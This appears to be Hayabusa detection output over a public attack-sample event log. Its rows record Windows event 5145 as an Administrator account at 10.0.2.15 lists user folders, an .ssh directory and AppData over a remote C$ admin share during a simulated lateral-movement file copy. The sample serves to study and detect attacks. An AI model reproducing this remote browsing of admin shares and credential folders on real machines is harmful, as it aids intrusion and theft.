2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.727 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.737 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.747 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.757 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.767 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator.EXAMPLE\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\.ssh  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
